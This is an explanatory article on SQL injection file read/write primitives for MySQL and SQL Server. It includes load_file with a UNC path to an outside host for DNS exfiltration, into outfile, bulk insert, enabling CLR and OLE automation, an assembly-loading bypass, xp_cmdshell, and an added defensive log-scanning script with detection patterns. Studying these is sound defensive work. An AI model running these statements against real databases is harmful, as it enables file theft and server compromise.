Summary of methods for reading and writing files through SQL injection
Preface
SQL injection includes direct SQL injection and file read/write injection. This article covers reading and writing files through SQL injection.
I. MySQL
Read files
Files are commonly read with load_file. The path string can be replaced by its hexadecimal encoding.
select load_file('C:/boot.ini');
select load_file(0x633a2f626f6f742e696e69);  # hex encoding of c:/boot.ini
select load_file('//ecma.io/1.txt');  # UNC path, used for DNS tunneling
select load_file('\\\\ecma.io\\1.txt');  # UNC path, used for DNS tunneling
Write files
I currently know two file writing methods:
select 0x313233 into outfile 'D:/1.txt'
select 0x313233 into dumpfile 'D:/1.txt'
II. SQL Server
Read files
1. BULK INSERT
create table result(res varchar(8000));
bulk insert result from 'd:/1.txt';
2. CLR Integration
-- Enable CLR integration
exec sp_configure 'show advanced options', 1;
reconfigure;
exec sp_configure 'clr enabled', 1;
reconfigure;
create assembly sqb from 'd:\1.exe' with permission_set=unsafe
The statement above uses create assembly to load any .NET binary file from the remote server into the database. However, it verifies that the file is a valid .NET program, so loading anything else fails. The loaded content is read back as follows.
select master.dbo.fn_varbintohexstr(cast(content as varbinary)) from sys.assembly_files
Bypass: first load a valid .NET binary file, then append the other file to the assembly. The bypass looks like this:
create assembly sqb from 'd:\net.exe';
alter assembly sqb add file from 'd:\1.txt';
alter assembly sqb add file from 'd:\notnet.exe';
3. Scripting.FileSystemObject
-- Enable Ole Automation Procedures
exec sp_configure 'show advanced options', 1;
reconfigure;
exec sp_configure 'Ole Automation Procedures', 1;
reconfigure;
declare @o int, @f int, @t int, @ret int
declare @line varchar(8000)
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'opentextfile', @f out, 'd:\1.txt', 1
exec @ret = sp_oamethod @f, 'readline', @line out
-- Print each line until readline reports a non-zero result
while (@ret = 0)
begin
    print @line
    exec @ret = sp_oamethod @f, 'readline', @line out
end
Write files
1. Scripting.FileSystemObject
declare @o int, @f int, @t int, @ret int
declare @line varchar(8000)
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'createtextfile', @f out, 'e:\1.txt', 1
exec @ret = sp_oamethod @f, 'writeline', NULL, 'This is the test string'
2. bcp file copy (test failed, no bcp.exe)
c:\windows\system32>bcp "select name from sysobjects" queryout testout.txt -c -S 127.0.0.1 -U sa -P"sa"
3. xp_cmdshell
exec xp_cmdshell 'echo test>d:\1.txt'
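For defenders, the statements above are searchable in database audit or query logs. The following is an added example, not code from the original article: it flags the MySQL and SQL Server primitives listed here and decodes hex literals, since a hex-encoded path hides the file name from a plain keyword search. The rule names and the sample log lines are constructed for illustration.

```python
import re

# One rule per file read/write primitive listed in the article.
# Rule names are hypothetical labels chosen for this example.
RULES = [
    ("mysql-load_file", r"\bload_file\s*\("),
    ("mysql-into-outfile", r"\binto\s+(?:outfile|dumpfile)\b"),
    ("mssql-bulk-insert", r"\bbulk\s+insert\b[^;]*\bfrom\b"),
    ("mssql-assembly-from-file", r"\b(?:create|alter)\s+assembly\b[^;]*\bfrom\b"),
    ("mssql-ole-automation", r"\bsp_oa(?:create|method)\b"),
    ("mssql-xp_cmdshell", r"\bxp_cmdshell\b"),
    ("mssql-enable-feature",
     r"\bsp_configure\s+'\s*(?:clr enabled|ole automation procedures)\s*'\s*,\s*1\b"),
]
COMPILED = [(name, re.compile(rx, re.I | re.S)) for name, rx in RULES]
HEX_LITERAL = re.compile(r"\b0x((?:[0-9a-f]{2})+)\b", re.I)


def decode_hex_literals(stmt):
    """Return printable text hidden in 0x... literals (e.g. a hex-encoded path)."""
    decoded = []
    for match in HEX_LITERAL.finditer(stmt):
        text = bytes.fromhex(match.group(1)).decode("latin-1")
        if text.isprintable():
            decoded.append(text)
    return decoded


def scan(stmt):
    """Return (names of matching rules, decoded hex literals) for one statement."""
    hits = [name for name, rx in COMPILED if rx.search(stmt)]
    return hits, decode_hex_literals(stmt)


# Constructed sample query-log lines (not captured from a real system).
SAMPLE_LOG = [
    "select id, name from users where id = 7",
    "select * from news where id=1 union select load_file(0x633a2f626f6f742e696e69)",
    "select 0x313233 into dumpfile 'D:/1.txt'",
    "create assembly sqb from 'd:\\net.exe';alter assembly sqb add file from 'd:\\1.txt'",
    "exec sp_configure 'Ole Automation Procedures', 1; RECONFIGURE;",
]

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        hits, decoded = scan(line)
        if hits:
            print(hits, decoded, "<-", line)
```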
III. Oracle
Skipped. Oracle has too many pitfalls ~~~ Almost all of the methods are restricted by PL/SQL.
Summary
The above is a summary of the methods for reading and writing files through SQL injection. I hope the content of this article helps you in your study or work. If you have any questions, you can leave a message.